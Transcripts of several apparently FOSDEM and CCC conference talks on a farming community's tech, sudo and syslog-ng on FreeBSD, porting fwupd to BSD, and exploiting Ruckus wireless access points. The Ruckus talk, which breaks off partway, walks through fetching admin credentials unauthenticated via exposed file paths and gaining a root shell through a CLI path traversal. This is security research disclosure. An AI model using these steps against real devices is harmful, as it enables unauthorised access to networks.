the people who come to buy the stuff know where it comes from, and, if they want, they can also go and visit the producer. And also because, as I told you, some of the organic stuff is organic but without the certification from the state, and a lot of the stuff that is transformed is inside the campaign Genuino Clandestino, which means it is transformed and made, but outside the law. And so you need the people who buy the stuff to be well informed. Sorry, sorry, I'm very sorry, but we don't have time for follow-up questions. Also, I'm very sorry, I would have loved to let the person who asked the first question also ask the last question, but we ran out of time. But I'm sure that you can still catch Andrea after the talk and ask whatever questions were not answered. So first of all, thanks for all of your very interesting and clever questions, and also thank you very much, Andrea, for the great presentation. Please give another big warm round of applause for Andrea. Thank you very much. Thank you.
We will analyze the approach to technology (decisional method, mesh network and cloud) of a farming community near Bologna: Campi Aperti. Speaking about: human organization, connectivity, managing a server, resource and incident handling, feminism, maintaining and growing in a non-hierarchical organization. Technologies involved: humans, antennas, an orchestrator of containers. We summarize the experience of the last 15 years of a group of farmers: the strong political impact of taking care of the nearby territory, deciding what to grow and what to eat and sharing these decisions with the consumers in the city; they settled on a method called "shared warranty", garanzia partecipata, for the organic vegetables, and they refuse the big distribution of food. We show how these principles, together with some feminist ideas, can bring us to think in a different way about our tech organizations and our tools. In the last 3 years the group Campi Aperti and Genuino Clandestino, the Italian network of self-managed farmers, started to ask questions and find solutions about technologies and slowly started to maintain their own services.
10.5446/48041 (DOI)
Hi, I'm Peter Czanik, open source evangelist at One Identity. Today I will talk about what is new in sudo and syslog-ng and provide you with a BSD-specific view. I started to use FreeBSD in 1994. Today I will spend most of my time on sudo and syslog-ng. I will introduce you to what is new with these two pieces of software and also show you how to install them on FreeBSD, either from binary packages with pkg or by compiling them yourself from ports. Finally, I will also show you how to run syslog-ng in Bastille. So let's start with sudo. What is sudo? I have asked this question of thousands of people over the past few years, and the typical answer depended on the experience of the person and fell into three main categories. For most people, sudo is a tool to complicate life: why use sudo if you can log in as root or use the su command to change to root? But even seasoned administrators told me that, well, sudo is just a prefix for administrative commands, and only a few people told me that they know some of the advanced features of sudo. So what is sudo? Sudo allows a system administrator to delegate authority by giving certain users the ability to run some commands as root or another user, while providing an audit trail of the commands and their arguments. So as you can see, it's a lot more than just a prefix. If we can believe xkcd, it can even get you a sandwich; just make sure that when you make a request for a sandwich, you use the sudo prefix. Back to more serious topics. Sudo comes with a huge set of useful defaults, but if some of these do not fit your use case, you can change these defaults using the Defaults statement in your configuration. Here are a couple of examples, like changing which path is considered secure by sudo, which environment variables to keep from the user's settings, and disabling insults for the users. You can also make defaults user- or host-specific. For example, the last line on the screen shows how to enable insults for members of the wheel group. So what are insults? Insults are fun, but not always politically correct, error messages shown when someone mistypes a password. It's a kind of sysadmin humor. As you can see, it's nothing harmful, but still some people find it offensive, so it's now disabled by default. Another lesser known feature of sudo is digest verification. You can store the digests of applications in the sudoers file, and this way sudo always compares the digest with the application before running it. The downside is that it's quite difficult to maintain this database in your sudoers file. On the other hand, this way you can prevent modified binaries from running, and it provides you with an additional layer of protection if you don't trust your users. Another feature is session recording. Sudo can record everything that is happening on your terminal, which is especially useful when you have users who need shell access instead of just some specific commands. The recordings can be played back just like a movie. They are quite difficult to modify, as they are not clear text. On the other hand, these files are saved locally, therefore they are easy to delete with unlimited access. The good news is that starting with sudo 1.9, which was released last year, session recordings can be collected centrally, which means that anything a user does is streamed in real time to another location, so they cannot modify or delete the recordings. Once you have more than just a handful of machines, you want to manage your configurations centrally.
Most configuration management systems support sudo, but sudo itself also has built-in support for central configuration: you can store your configuration in LDAP, which has the advantage that settings propagate in real time and cannot be modified locally by users. On the other hand, there are quite a few limitations: for example, you cannot use aliases, and if your network is down you might not be able to run sudo. Another feature which was added in sudo 1.9 is Python support. Previously you could extend sudo through C-based plugins, but now you can write your own extensions to sudo in Python, using the very same APIs. The advantage of Python is that there is no need for a dedicated development environment or for compiling your code, and you can even distribute your Python code using a configuration management system. One of the most interesting APIs in sudo is the I/O logs API. Using this API you can access input and output from user sessions. For example, you can use Python to break connections if a given text appears on screen, so it's a kind of data leak prevention, or you can analyze the command line that users are trying to run and break the session if someone tries to use rm -fr on the command line. Here is a short Python example. It's fully functional, but of course it doesn't cover any corner cases, it's just to show how it works. In this case, any time "mysecret" appears on the screen, the session is broken (a sketch of this kind of plugin is shown below). On the following screen I will show you how it works. I created a file called mysecret in a directory, and before it could be shown on screen, the session is terminated. Here is the screenshot: the user starts sudo with -s, so it starts a shell, changes to the root directory, lists the directory and can see that, oh, there is that directory called "do not enter", it must be something very interesting, let's check it out. The user changes to this directory and types the ls command, but before mysecret could appear on screen, the session is terminated. Now let's change to syslog-ng. First of all, what is logging? Logging is the recording of events happening on a computer, such as an SSH login message, and most people are only aware that you can see what happened on your system in text files in the /var/log directory. So what is syslog-ng? It's an enhanced logging daemon with a strong focus on portability and high-performance central log collection. Originally it was developed in C, but now you can extend it in Python or Java as well. And it has many more features than just simply saving log messages to text files. Let's see the four major roles of syslog-ng. The first role is collecting data. We can collect system and application logs together, providing quite useful contextual data for either side. It can collect log messages from a wide variety of platform-specific sources like /dev/log, the journal, Sun streams and so on. As a central log collector it can collect log messages over the network, using the legacy or the new syslog protocol, over UDP, TCP and encrypted connections. And it can also collect logs, or any kind of text data, from applications through files, sockets, pipes and even application output. If none of these fits your needs, you can extend syslog-ng using Python and, for example, add an HTTP server to syslog-ng to collect log messages, like the HTTP Event Collector in Splunk. The next role is log processing. You can classify, normalize and structure logs with built-in parsers.
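Before continuing with the built-in parsers, here is a minimal sketch of the kind of sudo 1.9 Python I/O-log plugin described a moment ago: it watches terminal output and rejects the session when a forbidden string appears. The method name log_ttyout, the sudo.RC return codes and the sudo.log_error helper follow the sudo_plugin_python manual, but treat them as assumptions to verify against your sudo version; registering the class would happen in sudo.conf via the python_plugin.so loader with ModulePath and ClassName options. Corner cases (buffering, partial matches across writes, encodings) are deliberately ignored.

```python
# Hedged sketch of a sudo 1.9 Python I/O-log plugin for simple data-leak prevention.
import sudo

FORBIDDEN = "mysecret"

class DLPIOPlugin(sudo.Plugin):
    def log_ttyout(self, buf):
        # buf holds the data that is about to be written to the user's terminal
        text = buf if isinstance(buf, str) else buf.decode("utf-8", "replace")
        if FORBIDDEN in text:
            sudo.log_error("forbidden text on the terminal, rejecting the session\n")
            return sudo.RC.REJECT   # breaks the session before the text is shown
        return sudo.RC.ACCEPT       # otherwise let the output through
```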
For example, the CSV parser can parse any kind of columnar data, like Apache access logs, and other parsers can handle freeform log messages, like the SSH login message. And there are parsers for JSON-formatted messages, for key-value pairs, and even for XML. And these parsers can also be combined, so we also have parsers for Cisco log messages and for many more. You can also rewrite log messages using syslog-ng, and you don't have to think about falsifying log messages here, but, for example, anonymization is required by different compliance regulations, like finding and overwriting credit card numbers in log messages. You can also enrich log messages: add additional fields based on the message content, or use the GeoIP parser to add geolocation to IP addresses. Or you can reformat log messages using templates: the Elasticsearch destination needs JSON-formatted messages, some SIEM systems need the ISO date format, and so on. And if you want, you can parse your log messages using Python; you can implement any of the above features in Python as well, or enrich your log messages from databases and also do filtering from Python (a small sketch of such a Python parser follows below). Which brings us to our next topic: filtering data. It has two main uses. One is discarding surplus log messages: you don't want to store debug level messages, as storage is expensive and these messages are rarely used. Another use for filtering is message routing, like making sure that all of your authentication-related events reach your SIEM system. There are many possibilities for filtering: it can be based on message content or different message parameters, you can use comparisons, wildcards and many different filtering functions, and best of all, you can combine any of these with Boolean operators to make really quite complex filters within syslog-ng. Finally, you have to store your log messages somewhere. Most people are only aware that they can store log messages to text files, either locally or on the central syslog-ng server. But there are many more possibilities: you can store log messages to databases, to different SIEM systems, to big data like Hadoop, Elasticsearch, MongoDB, to message queuing like Kafka or AMQP. So there are many possibilities, and if none of these fits your needs, you can use Python or Java to extend syslog-ng with a new destination. Here you can see a heat map of IP addresses as found by the GeoIP parser in syslog-ng. This is real data, it's from my home router sitting in a quiet suburb of Budapest, but as you can see, the network itself is anything but quiet: everyone from around the world tries to connect, but is fortunately kicked out by my firewall. Here I combine sudo and syslog-ng and send alerts from sudo to Slack in real time. Sudo logs are parsed automatically by syslog-ng, so all I had to do was add a filter on my username, and whenever I do something through sudo, syslog-ng sends a message to Slack in real time. Of course, alerting on myself is not much use, but you can do the same on your hosts with multiple engineers using sudo. So here comes a tricky question: what do the BMW i3 and the Kindle e-book reader have in common? The answer is syslog-ng. Both of them are running syslog-ng. And most people are not aware that hundreds of millions of devices run syslog-ng. Where else are syslog-ng and sudo used? Sudo is installed on almost all BSD, Linux, Unix and macOS systems, so many devices. And syslog-ng is available on most Linux distributions and BSD variants.
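As a rough illustration of the Python parsing and filtering mentioned above, here is a minimal sketch of a syslog-ng Python parser. The parse(self, log_message) interface and the python(class(...)) configuration reference follow the syslog-ng documentation, but the details (for example whether values arrive as bytes) should be checked against your syslog-ng version; the name-value pair "sudo.command" is just an illustrative choice, not a standard field.

```python
# Hedged sketch: a syslog-ng Python parser that both filters and enriches
# sudo log messages. On the config side it would be referenced roughly as:
#   parser p_sudo { python(class("SudoTagger")); };   (assumed syntax)
class SudoTagger(object):
    def parse(self, log_message):
        msg = log_message['MESSAGE']            # message payload, treated as bytes here
        if b'COMMAND=' not in msg:
            return False                        # returning False drops the message (filtering)
        # enrichment: store the executed command in its own name-value pair
        log_message['sudo.command'] = msg.split(b'COMMAND=', 1)[1]
        return True                             # returning True keeps the message
```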
Back to where syslog-ng shows up: it is running by default on most BSD-based appliances like FreeNAS or OPNsense. It is also on Synology and QNAP network-attached storage systems and on Turris Omnia routers. I would not be surprised to learn that it is also running somewhere in space. So let's see how you can install this software on FreeBSD. Sudo is available in the FreeBSD ports under the security group. This port is kept pretty much up to date; it follows the 1.9 line of sudo. If you install the binary package using pkg, it only has the very basic functionality. But don't worry, most people don't need more than that. But if you need any of the advanced functionality I mentioned earlier, then you need to compile sudo yourself from ports. For example, if you want to enable insults, you need to compile sudo yourself, but also if you want LDAP, Python or Kerberos support within sudo. Syslog-ng is also in FreeBSD ports, in the sysutils group. I am a co-maintainer of this port, so it is also kept up to date. If you use the pre-built binary package, syslog-ng provides only basic functionality. But let me define basic: previously we tried to keep the extra dependencies low, so we only enabled features that did not need any external dependencies. But over the years, some extra features were enabled, like TLS, so encryption support has been enabled by default for years. Two years ago we enabled JSON support by default, and last year HTTP support was enabled by default as well. This means that without recompiling syslog-ng, you can store log messages to Elasticsearch or to many different cloud-based logging-as-a-service providers, like Sumo Logic or Loggly, for example. But you still need to compile syslog-ng from ports yourself if you want to enable support for language bindings like Python or Java, if you want to store your log messages to databases like different SQL databases or MongoDB, if you need message queuing like AMQP or Kafka, and to support many other technologies like SMTP, SNMP, GeoIP and more. Finally, I want to show you how to run syslog-ng in Bastille. But first of all, what is Bastille? Bastille is an open-source system for automating deployment and management of containerized applications on FreeBSD. It does not have any hard dependencies on any other applications; the only exception is git, if you want to use the templates. And we want to use a template for syslog-ng as well. On the next slides I will show you how to install Bastille and get to your first syslog-ng jail. First you need to install Bastille from ports; it is also in the sysutils group. Then set up Bastille and configure your firewall. Then create a new jail, install syslog-ng using the template, and finally configure your firewall again to redirect a port to the jail. On my slides I will show you only a very basic setup, but there are many more possibilities: you can use ZFS, VNET and other advanced FreeBSD technologies. The latest version of Bastille you can install from ports, a freshly updated port, as it was just released last week. Just change to the directory, make install clean and enable it. The simplest setup, which works everywhere, is to use a cloned interface, use private IP addresses for your jails and redirect external ports to your internal network using the PF firewall. The next slide shows you the pf.conf. Using this, you can protect your host and forward connections to your jails without editing your firewall configuration anymore, as Bastille can maintain your firewall settings. And finally I will show you how to get started with the Bastille commands; a rough sketch of them follows below.
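The commands themselves were shown on slides that are not part of this transcript, so the following is only an approximate sketch; the release number, jail IP address and the location of the syslog-ng template are placeholders to be checked against the Bastille documentation.

    # install Bastille from ports (sysutils/bastille), then enable and start it
    sysrc bastille_enable=YES
    service bastille start

    # bootstrap the FreeBSD release and the syslog-ng template (template URL is a placeholder)
    bastille bootstrap 12.2-RELEASE
    bastille bootstrap <URL-of-the-syslog-ng-template-repository>

    # create a jail on a private address, apply the template, then redirect a port to it
    bastille create syslogng 12.2-RELEASE 10.17.89.10
    bastille template syslogng <template-name>
    bastille rdr syslogng udp 514 514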
As a first step you need to bootstrap a release of FreeBSD you want to use. I used 12.2, and I also bootstrapped the syslog-ng template. Next I created a jail using this release on a private IP address, then applied the template to this jail, and as a final step I redirected an external port to the internal network. Now you are ready to send log messages from your other hosts to syslog-ng running in Bastille. And now it's time for questions. Thank you for your attention. Okay, we're going to switch to live now. Can you hear me? Yes, I can hear you. Okay, excellent. So thanks, Peter, for this great presentation. Now it's time for questions. I saw you started answering some of them in the chat. Maybe we have other questions. Someone was asking if using the Slack destination is documented somewhere. Of course it's part of the official documentation, but I also have a blog about it and I sent the URL to the chat. You can find this blog and many others about how to use syslog-ng on syslog-ng.com under the Community menu item, and not just Slack but many other use cases are described there, including the steps for how to install syslog-ng on FreeBSD and other operating systems. So please go ahead if someone else has questions. No. So I think that's probably all. Thank you very much for your presentation. Thank you for welcoming me here. And if you still have any questions, I will stay here for a while and can answer anything. Okay. And I hope we will see you next year with another great presentation, and probably answering questions again. Thank you very much. And I think this is the end for the BSD Devroom. Thank you all for being here. All the presentations and videos will be available on the FOSDEM website, I think probably today, maybe tomorrow. And I think that's all. I hope I will see you next year, probably in Brussels, so we can share some waffles and a couple of beers together and enjoy the rest of the day. Thank you very much. Goodbye. Thank you. Thank you. Thank you.
Most people consider sudo and syslog-ng as old, small and stable utilities. Yes, they are from the ‘90s, but both are constantly evolving, gaining many interesting new features along the way. Peter, who is an evangelist for these two applications, shows you some of the most interesting new developments in both projects. By default, only basic functionality is enabled in FreeBSD ports, so we will also take a look at some of the extra features you can enable if you compile the packages yourself. On the syslog-ng side most people know that it can save incoming log messages to text files, and few are aware of the complete set of features this tool has. Syslog-ng has four major roles: collecting log messages, processing, filtering and storing them. There are many supported log sources and you can write your own in Python. Or another example: it can find credit card numbers in logs and remove them to comply with PCI-DSS. And syslog-ng can store logs not just to text files, but to databases, big data destinations, like Hadoop, or to Splunk or Elasticsearch as well. Sudo is mostly known as a prefix for administrative commands. Did you know that you can also record sessions, extend sudo with Python scripts and even analyze what is happening on the screen? Learn which of the above mentioned features are supported in FreeBSD ports (hint: all of them), which are enabled by default, and which features require you to recompile sudo or syslog-ng.
10.5446/48081 (DOI)
Hello, my name is Norbert Kaminski and today I will tell you about porting FWAPD to the BSD distributions. That means keeping your hardware safe with up-to-date firmware. Okay, let's start with agenda. At the beginning of the presentation I will tell you about project Genesis and BSD community concerns. Then I will go to overall information about FWAPD and I will show you tool architecture. Then I will present you firmware and metadata update verification process. In the middle of my presentation I will show you our previous ports for Kube's operating system. And then I will go to our current status of work and main problems that we face now. At the end of my presentation I would love to hear your opinion about our project. At the beginning of my presentation let's type who am I, comment. My name is Norbert Kaminski, I'm working as an Embedded System Engineer at 3MDep Embedded System Consulting. I'm actively contributing to open source projects mainly to your layers like MetaPC and Rhymes or MetaTrangeBoot. Our last open source project were FWAPD wrapper for Kube's operating system. In my scope of interest are firmware upgrade tools, virtualization and Embedded Linux. If you want to catch me you can do it by my socials that are linked here. Why we want to port FWAPD to BSD distributions? Our clients were asking us if there is easy way to upgrade firmware from BSD operating systems level. The second reason is that community were asking if there is possibility to port FWAPD to BSD distributions. So we connected that fax and we've created the project FWAPD port for BSD distributions that is founded by an old net foundation. During the discussion on BSD subreddit there appear some concerns about FWAPD project. This presentation I will try to clarify with doubts. Main objection were why I should trust a firmware provider. Do I need a demon running all the time to check the updates? I don't need this FWAPD project because I can send an email to manufacturer and then update my firmware by USB stick. Let's go to some overall information about FWAPD project. Security of this system is determined not only by the software entrance but also by the firmware. The vulnerabilities of the firmware can migrate to this system and for this particular reason we should keep our firmware up to date. Non-windows users face three main problems during the firmware update process. The first problem is that windows specific tools do not work with other systems. That problem is that users sometimes have no idea what hardware it runs and if this hardware is supported by this firmware update. The third trouble that clarifies one of these doubts I showed in the previous slide is that it is hard sometimes to find a proper update at the internet. It's really painful and FWAPD can query your hardware check if there is available update and download and update this securely. So our mission is to provide the FWAPD to BSD distributions to make the firmware update process easier. Let's look at FWAPD architecture. It could be split into three parts. First part is the internet layer where it is placed. LVFS that could be extended to Linux vendor firmware service. It holds in the database firmware updates and firmware metadata. Metadata contains information about possible updates that could be downloaded by the session layer. Metadata is delivered by the content delivery network and firmware is delivered by the directly TV session layer. In this session layer there is FWAPD manager. 
FWAPD manager holds all process of the firmware update. It asks LVFS for metadata about new updates and if there are updates available it asks user if he wants to upgrade his devices and if he wants he downloads the firmware and put it to the cache. Cache could be used to test the device to download and upgrade the firmware without downloading the firmware all the time from the LVFS. That could be used also if you want to upgrade a few of the same devices. So FWAPD manager also contacts with the system session where it leaves FWAPD demon. FWAPD demon connects with the devices and provides information about the devices to the FWAPD manager and if there is update possible it provides new firmware to the devices. Let's talk a little more about Linux vendor firmware service. The LVFS is web service that is used by manufacturer to upload the firmware. The LVFS provides also information about the updates in metadata form. The firmware is packed into Kabynut files that contains metadata information about specific update. It also contains JCAD files that are used to validate the firmware process. The one who we trust in the firmware process is manufacturer because manufacturer is signing the firmware not LVFS service. So that clarifies that objection about trusting the firmware provider. Now I will go to firmware and metadata verification process. Since version 1.4.0 FWAPD uses libJCAD to verify the metadata and firmware updates. For that version FWAPD required during the verification process PKS7 or GPG signature. LibJCAD allows reading and writing JZIP compressed JSON catalog files that contains GPG and PKS7 signatures. And it also contains checksums of the files that are contained in the Kabynut files. So during the verification process libJCAD is looking for the firmware. Then it checks if GPG and PKS7 signature matches and also checks checksums. The FWAPD manager uses this information to validate that files that are provided from the LVFS are good to go and ready to upgrade. Now I will go to our previous part for Kube's operating system. We have implemented a wrapper for FWAPD which allows upgrading firmware in virtualized system. The Kube's is one of the most secure operating system based on Linux kernel. It leverages Zen hypervisor to create and manage Kube's which are isolated compartments. Here you can see architecture of our wrapper. It is based on three Kube's. First Kube is update VM which is connecting with LVFS and it's downloading the firmware for the device. And it's DOM0 the administration VM which allows to communicate with the device. And the last Kube is CCUSB which allows to communicate with devices connected to the USB. The whole operation of the update is handled by Kube's FWAPD manager which calls the update VM to download the firmware. Then it is cached like in the FWAPD architecture. It's also validated on every step of the firmware process, updating firmware process. Then it is transferred from one virtual machine to the other. The other once again validates the same update file and then it is distributed to the FWAPD demo on VM or once again transferred to the CCUSB VM. Then the demos are installing the updates of the firmware. We would like to provide the FWAPD functionalities for four distributions. FreeBSD, DragonflyBSD, NetBSD and OpenBSD. First of all we would like to implement firmware updates for USB devices. After that we will implement the UFI capsule updates for motherboards and UFI based devices. 
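For context, this is roughly the end-user workflow that fwupd's command-line client already provides on Linux and that the BSD ports aim to reproduce; these are standard fwupdmgr subcommands, with output omitted.

    fwupdmgr refresh      # download the latest metadata from LVFS
    fwupdmgr get-devices  # list the devices fwupd recognizes
    fwupdmgr get-updates  # show which of those devices have pending firmware updates
    fwupdmgr update       # download the signed cab archives and apply them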
Currently we are trying to compile FWAPD under the FreeBSD distribution. Most of the FWAPD dependencies is already available in the FreeBSD package manager. But we are facing some problems. LeapGUSB is a hard requirement of the FWAPD. Port of this library was started by Ting Weilang and this library is based on Leap USB 1.0. FreeBSD distribution provides its own implementation of this library but this implementation lacks in function that LeapGUSB is using. This function is specified in the FreeBSD bugzilla in the Strat. During the method configuration we are looking for libraries where we find library methods of the compiler object. This method doesn't work correctly so we have to change it to hard dependency to make the configuration of the project work correctly. FreeBSD also uses DevD instead of UDAF. We have to turn off all plugins that are using UDAF or in the later stage we can just replace UDAF with DevD. Also there is no system D in the BSD distribution so we have to turn on this option. Another problem is that FreeBSD kernel does not support ESRT. ESRT is EFI system resource table which is based for UFI capsule update. The ESRT provides a read-only catalogue of system components which the system accepts to be upgraded via UFI capsule update feature. The module allows user-land to evaluate what firmware updates can be applied to the hardware and devices. Now when you are trying to compile the FWUPD we are failing due to Linux header dependencies so we have to fix that as well. If you want to contact us here are the links. We are open to discuss and cooperate. Now it's time for questions. We would love to hear your opinion about the port of FWUPD for BSD distributions. Thank you. Thank you for your attention and waiting for questions. Thank you for your great presentation. So now it's time for questions. So please if you have questions you can write it on the BSD room chat. If you have any doubts about this project you can also type them in the BSD chat and I will try to answer them. Maybe I will tell you some more about the progress of this project. Now we can compile the FWUPD project in free BSD distribution with turn off all the plugins that are connected with Linux and we created some if defines in the FWUPD project. Currently we are able to get some information and development tool that is called FWUPD tool. And we are able to refresh metadata that means there are some information about the available updates like I said in my presentation. So now we are trying to fix the problems that are connected with the configuration localization of configuration files in BSD distribution because that differs from the Linux one. I will really appreciate your opinion about this project because I heard some comments in Reddit and I will really appreciate if you would say something about that. So if you don't have questions regarding this project maybe... Oh there is one. There is a question. Okay go ahead. Okay is there any privilege separation work in FWUPD? Probably it's too early for something like that but it would be possible to run this under CapsU come or something similar and also picking for... And also thanks for picking that. Yeah, there is a privilege separation in FWUPD. You need the... So the privilege is to update the firmware of the device and you have to accept this firmware update. So it won't be without your knowledge. This won't be updated without your knowledge. And I can... Okay but would it be possible to run under CapsU come or something similar? 
I'm not sure what you mean under the term of CapsU come so maybe you can clarify or I will just go go that. Just to clarify, yes CapsU come is the security framework under 3DSD. So you can provide or you can drop privileges from an application. So as an example when an application needs to access a file, once you access the file and have the file descriptor you can drop the privileges to access the file system. So you guarantee nobody can use your applications to perform and desire actions. Okay, I understand. We have to look at that for sure and it's really important to make these vulnerable operations like updating the firmware in secure way. So it will be really helpful to use this framework. I will make some notes on my left side. Thank you for your great talk. Thank you. I appreciate that you want to watch it. It's very important to have firmware updated on every system. Yeah, I agree. I think this project is very important. I will look forward. I have camera here and I cannot read all the questions. Wait a second. Okay, I think this is a very important project and I will look forward its production ready version. Yeah, I will appreciate that. I think we will send some status blog posts on our site, free and depth site where we will inform you how is project going and where we are in current time. I think there is probably one question. No, it's just thanks. Okay, thank you so much. Thank you so much for your question. Thank you for your presentation. It's a very good one. It's my first presentation on FOSTA. Last year I was just a viewer in Brussels in Belgium. And now I'm the presenter in virtual event. That's very cool. Okay, so don't hesitate to come back next year. I hope this year, next year, we will all be in a real room with people and so on. Yeah, we should talk about this, about putting the LWBD in Hello System. I agree. Excellent. So, thank you very much. Thank you. And if there is no more question, I think we can close here the QA session. Okay, I encourage you to contact me if you have any more questions. And thank you once again for your time. Thank you very much. Thank you. Bye. Bye.
This presentation will describe the plan of porting the fwupd daemon to BSD distributions (FreeBSD, OpenBSD, NetBSD, DragonFlyBSD). It will explain the challenges connected with the implementation of firmware update systems. Through the fwupd daemon port, we will extend the functionality of the Linux Vendor Firmware Service (LVFS) to another family of systems. I will demonstrate the process of porting the fwupd/LVFS, based on the previous implementations. Also, I would like to present the fwupd/LVFS chain of trust and answer any questions the BSD community may have on this topic. I would love to hear some suggestions and feedback, which we should take into account during the development process. The security of the whole system is not determined only by the software it runs, but also the firmware. Firmware is a piece of software inseparable from the hardware. It is responsible for proper hardware initialization as well as its security features. That means that the safety of the machine strongly depends on the mitigations of vulnerabilities provided by firmware (like microcode updates, bug/exploit fixes). For these particular reasons, the firmware should be kept up-to-date. Nowadays, one of the most popular firmware update software is fwupd/LVFS. fwupd is a Linux daemon that manages firmware updates of each of your hardware components that have some kind of firmware. What is more fwupd is open source, which makes it more trustworthy than proprietary applications delivered by hardware vendors designed for (only) their devices.
10.5446/53155 (DOI)
Welcome to the next talk. Don't rock us too hard. Owning Ruckus AP devices, which will be, I think, one of the more hardcore hacking talks as we like it here at the Congress. Please give our speaker a round of applause. Just one minute and I'll be good to go. What is that? Awesome. So I'm doing a live demo, so I need to just be prepared with some stuff with a terminal here. It's always good. Another one. Why not? Okay. Wait. What the? Come on. Almost got it. All right. Yeah, now I am almost good to go. Awesome. Thank you, and thank you, CCC, for inviting me to speak here. Before I begin, I would like to ask if anybody is familiar with Ruckus network devices. Raise your hand. All right. Okay. Well, CCC is going to hate me for the next slide. But the first time I saw Ruckus access point was when I intended black at USA this year. I noticed that Ruckus provide the conference Wi-Fi. And when I got back home, I was wondering how many vulnerabilities were discovered on Ruckus equipment. So I did a quick research on cvdetails.com, and I saw that Ruckus had 11 CVEs, and five of them were critical. Those CVEs were post-authenticated command injection. Well, this means no pre-auth RCE were found on Ruckus devices and only post-authentication. So that either means that they are really, really secure, or I let you answer this question yourself. So wait. Before I begin, who am I? My name is Gals War. I'm from Tel Aviv, Israel. I'm a research leader at Aleph Research by HCL Abscan. And I've been doing reversing for around 10 years. And I focus on offensive and embedded devices research. And in this talk, I will be using this Ruckus R510 Unleashed. Ruckus has an Unleashed version for every access point they provide. Unleashed are access points that don't rely on Wi-Fi controllers. However, all access points on this list share the same vulnerable code base. And I noticed that some vulnerabilities also work on zone director product line, which is their Wi-Fi controller. The vulnerabilities, I will show, affect this firmware version and prior. Firmware analysis was pretty much straightforward. No compression, no encryption. And on the R510, you can even get the kernel B config from some odd wisdom. Well, another cool thing about this research is that I did this entire research with device emulation. Only when I actually found a vulnerability, I actually bought a device. Now I would like to talk about my device emulation environment. I'm using my simple yet useful emulation dockers. On my Docker hub, I got pre-built QMU systems for different architecture, such as ARMv7, ARMv6, MIPS and MIPSell. And these dockers really helped me emulating and setting up different routers. For this research, I used Docker that wraps an ARMv7 QMU that runs Debian kernel. And now I would like to show you how easy it is to set up an environment. And that, of course, does not work. So let me just... Hmm. Just a minute. Okay. So just a few more minutes and I'll show the video. Okay, got it. Oops. Awesome. Okay, so here... So here I'm just starting my Docker with port 5575. And I am... Yeah, I'm gonna fast forward a bit because it's not the edit one. And here it just starts up. It takes a few minutes. So I cut it out from the original video. I'll just... All right. Now I'm gonna go to the firmware extraction folder and just start the squashFS root system. And now I can just copy it using SCP to the port, the Docker map to. And now I just tar it and then ssage to the Docker. And I got the tar gz file. I'm gonna extract it. 
Get into the folder. Sorry. Get into the folder and just use truth to change my root to this squashFS. In any minute. Yeah. All right. So now I'm running truth, change my root. And now I got the rocker's banner and the busybox. The rocker's busybox. And I can see there in its d scripts, which are the startup scripts. Okay. This is it for the doctors. And let's start with some exploits. So this is my first RCE. In this attack, I will fetch admin credentials without authentication and then pop a busybox shell with jailbreak through ssage. Let's start with live demos because demos are fun and what could possibly go wrong, right? Just about everything. But yeah. All right. So for this, I got my terminal and awesome. Let me just do this. Okay. Great. So now I'm going to fetch a file from the router. I'm just using W get and this is my router IP address, the one here. And I'm fetching a file from slash users slash WPS tool. Oh, shit. Thank you very much for that. Yeah. Live demos, right? Yeah. They told me not to do that. Okay. So this is the right terminal. And let me just adjust it as well. Got it. So this one you see, right? Yay. Okay. So I'm using W get and I'm just going to fetch a file from the router IP from user WPS tools to cash slash var slash RPM key dot rev. So I probably got a typo here. And yeah. So now I got the number eight and now I'm going to fetch the same file only with eight and pipe it through strings and grab something called all powerful login. And hopefully I got a typo. Okay. Got it. Powerful login. Yeah. I'm going to copy paste the hell out of it with the right number, which is eight. And this is it. Finally. So those are the admin credentials. I just fetched them unauthenticated just like that. And now to finish my exploit, I will just log into the ssage using the credentials I just fetched. And now I will enter the debug mode, script mode, and use ex command to run being a sage. And as you can see, I got my busy box and I am the admin and I am part of the root group. And this is it. Thank you. Wow. Live demos are tough. Okay. So let's understand what we just saw here. So I started by examining the web server configuration. Rokus uses embed this as its web server interface. And this is how the configuration file looks. We see that it uses slash web as its web root directory. And we also see that it uses EGS handler for dot EGS and dot JSP extension. EGS is embedded JavaScript back in language that the web server uses. But the most important thing is what we don't see here. We don't see any file fetching restriction. That means I can fetch any file from slash web directory regardless of its file extension or type. In other words, no access control whatsoever. Yeah. So now that I know I can fetch any file, I would like to look for some interesting file to fetch. There are 67 files that are not standard web pages. Eight of them are symbolic links. And one in particular is this symbolic link to slash TMP dear. That means every file I will fetch from slash user slash WPS underscore tool underscore cache gonna fetch files from the TMP folder. Yeah. And since I was emulating the router using QMU system mode, I could run the system in its scripts. And I noticed that some files are written to slash TMP on system startup. One of them was this one, RPM.log. This log shows that every day the router writes a backup file called RPM key with a different reversion number. And that file looks like a really good file to fetch. The problem was that it writes it to slash var slash run. 
I can only fetch files from slash TMP. Well it's not a problem. Slash var slash run is also symbolically linked to slash TMP slash var slash run. Yay for me. Right. So now let's see how I was able to fetch this RPM key file. So yeah, slash user slash WPS tool cache is symbolically linked to TMP. Var run is symbolically linked to TMP var run. Now I was needed to get the RPM key reversion number. Here it's 11. Well there's a file called RPM key dot rev that just stored this number. So I first needed to send a request to get this number. And after that I can just fetch the right RPM key file. Okay. So now that I fetch this RPM key file, I noticed that it contains some binary data. So I just pipe it into strings. And as you can see here, these are the admin credentials in plain fucking text. Right. Yeah. Okay. Great. So to finish my RCE, I wanted a busybox shell. SSH can be enabled from the web interface. But the thing is, Raku's are using their own CLI. At first I tried to run a busybox with hidden command called exclamation mark, V54 exclamation mark. And as you can see, it's supposed to exit the CLI and enter the operation system shell. But the problem was that it needed the device serial number and I don't necessarily got this number. So I had to use a different approach. Basically I used the CLI debug script mode that was only supposed to run store shell scripts. However, this exocommand is vulnerable to pass reversal. So I just used it to run being a sage and I got a busybox shell as root. Awesome. So after this beginner's level CTF vulnerability, it got me thinking. There are probably more vulnerability to discover here. And I was wondering in how many ways I can get code execution on those devices. So this is my second RCE attack. Here I'm exploiting a stack overflow vulnerability with unauthenticated request to an adjunct page. Okay. But before that, I would like to talk about GDRA script I wrote that really helped with the reversing process. So Rocus has left all the log strings in the binary. As you can see here, we got debug, error, info, warn, just about everything. And here we can see a GDRA decompiled code for a function and it's debug log print. What's even better is that Rocus also print the function name for every log print. So I wrote a script that just searched for this log print and renamed the unnamed function with the function from that log print. So here I just updated the name to get ZDDN instead of the undefined function. And here we can see a binary called EMFD. I was able to reduce its undefined function from 1500 to less than 900, which makes the reversing process way shorter. Based on that script, our team member, Vera Mence and I wrote a generic script for GDRA. This script searched for patterns in GDRA, decompiled code and renamed the function with matches. Now I would like to show you how this script can work not only on Rocus code. 